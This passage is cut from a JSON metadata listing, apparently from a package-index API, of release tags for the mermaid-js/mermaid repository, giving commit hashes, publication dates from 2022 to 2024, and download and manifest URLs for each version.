url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.10/manifests"},{"name":"8.13.9","sha":"77f2a57155cfd9375eb0f633d365b6bd75c31158","kind":"commit","published_at":"2022-01-16T14:28:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifest